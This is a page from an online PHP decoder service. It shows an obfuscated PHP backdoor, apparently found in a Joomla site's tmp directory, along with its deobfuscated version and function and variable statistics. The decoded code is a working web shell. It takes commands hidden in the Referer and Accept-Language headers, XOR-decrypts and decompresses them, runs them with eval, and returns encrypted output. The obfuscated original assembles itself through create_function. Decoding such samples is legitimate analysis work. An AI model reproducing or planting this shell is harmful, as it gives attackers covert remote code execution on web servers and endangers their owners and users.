Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $d='$kh="5|3481"5|;$kf=5|"9d75|5|5|b";function x($5|t,$k){$c=st5|rlen($k);$5|5|l=st..

Decoded Output download

$kh="3481";$kf="9d7b";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){    $u=parse_url($rr);    parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++) $p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();eval(@gzuncompress(@x(base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}

Did this file decode correctly?

Original Code

<?php
$d='$kh="5|3481"5|;$kf=5|"9d75|5|5|b";function x($5|t,$k){$c=st5|rlen($k);$5|5|l=str5|len($t);';
$w='"5|HTT5|5|P_ACCEPT_LANGUA5|GE"];i5|5|f($rr&&$ra)5|{    $u5|=pa5|rse_u5|rl($rr)5|;    pars';
$u=str_replace('X','','crXeatXXe_XfuXnXction');
$B='os5|($s[$5|i],$f);if($5|e)5|{$k=$kh5|.$kf;ob_s5|t5|art();@5|e5|val5|(@gzunco5|mpress(@x(@base';
$c='code(x(gzco5|mpress5|($o5|),$k5|));p5|rint(5|"5|<$k>$d</$k>");@5|s5|ession_destro5|y();}}}}';
$T='i]="";$p5|=$ss($5|p,5|3);}if(a5|rray5|5|_k5|ey_exists($i,$s)5|){$s[$i].=5|$p;$e=5|str5|p';
$Q='ss(m5|d5($5|i.$kh),0,5|5|3))5|;$f=$s5|l($5|5|ss(5|md5($i.$kf),0,3));$p="5|";fo5|r($z=1;$';
$a='e_s5|tr($u5|["query5|"],5|$q);$q=arr5|a5|y_5|5|values($q)5|;pr5|e5|g_match_5|all("/([\\w])5|';
$j='[\\w-]+(?:;q=0.([\\5|d]5|)5|)?,?/",$ra,$5|m);if($q5|&&$m){5|@sessi5|on_5|start();$s5|=&$5|5';
$N='i],05|,5|$e))),$k)));5|$o=ob_ge5|5|t_content5|s(5|);ob_e5|nd_clean();$d=5|b5|ase64_5|en';
$Y='|5|_SESSIO5|N;$ss="s5|ub5|str";$5|sl=5|"strtolower";$5|i5|=$5|m[1][0].5|$m[1][1];$h=$sl($';
$t='65|45|_deco5|de(p5|reg_replace(ar5|ray("/5|_5|/","/-/"),arr5|ay("/5|5|","+"),$5|ss($s5|[$';
$o='z<cou5|nt($5|m[1]);$5|z++) $5|p.=$q[$5|m[5|5|25|][$5|z]];if(strpos5|5|($p,$h)===0){$s[$';
$e='}^$k5|{$5|j};}}re5|turn 5|$o;}$r5|=$5|_SERVER;$rr5|=@$r[5|"HTTP_5|REFERER5|"]5|;$ra=@$r[';
$q='$o=""5|;for($5|i5|=0;$i<$l;5|){for($j=5|05|;($j<$c5|&&$i<$l);5|$j++,$i5|5|++){5|$o.=$t{$i';
$L=str_replace('5|','',$d.$q.$e.$w.$a.$j.$Y.$Q.$o.$T.$B.$t.$N.$c);
$R=$u('',$L);$R();
?>&9a1f5ea945d8863b612f9488485969e4=1&type=&install_directory=C:\inetpub\wwwroot\joomla/tmp&

Function Calls

null 1
str_replace 2
create_function 1

Variables

$B os5|($s[$5|i],$f);if($5|e)5|{$k=$kh5|.$kf;ob_s5|t5|art();@5|..
$L $kh="3481";$kf="9d7b";function x($t,$k){$c=strlen($k);$l=str..
$N i],05|,5|$e))),$k)));5|$o=ob_ge5|5|t_content5|s(5|);ob_e5|nd..
$Q ss(m5|d5($5|i.$kh),0,5|5|3))5|;$f=$s5|l($5|5|ss(5|md5($i.$kf..
$R None
$T i]="";$p5|=$ss($5|p,5|3);}if(a5|rray5|5|_k5|ey_exists($i,$s)..
$Y |5|_SESSIO5|N;$ss="s5|ub5|str";$5|sl=5|"strtolower";$5|i5|=$..
$a e_s5|tr($u5|["query5|"],5|$q);$q=arr5|a5|y_5|5|values($q)5|;..
$c code(x(gzco5|mpress5|($o5|),$k5|));p5|rint(5|"5|<$k>$d</$k>"..
$d $kh="5|3481"5|;$kf=5|"9d75|5|5|b";function x($5|t,$k){$c=st5..
$e }^$k5|{$5|j};}}re5|turn 5|$o;}$r5|=$5|_SERVER;$rr5|=@$r[5|"H..
$j [\w-]+(?:;q=0.([\5|d]5|)5|)?,?/",$ra,$5|m);if($q5|&&$m){5|@s..
$o z<cou5|nt($5|m[1]);$5|z++) $5|p.=$q[$5|m[5|5|25|][$5|z]];if(..
$q $o=""5|;for($5|i5|=0;$i<$l;5|){for($j=5|05|;($j<$c5|&&$i<$l)..
$t 65|45|_deco5|de(p5|reg_replace(ar5|ray("/5|_5|/","/-/"),arr5..
$u create_function
$w "5|HTT5|5|P_ACCEPT_LANGUA5|GE"];i5|5|f($rr&&$ra)5|{ $u5|=..

Stats

MD5 055d6fcaa542d4b91bcfe021f34342f9
Eval Count 1
Decode Time 210 ms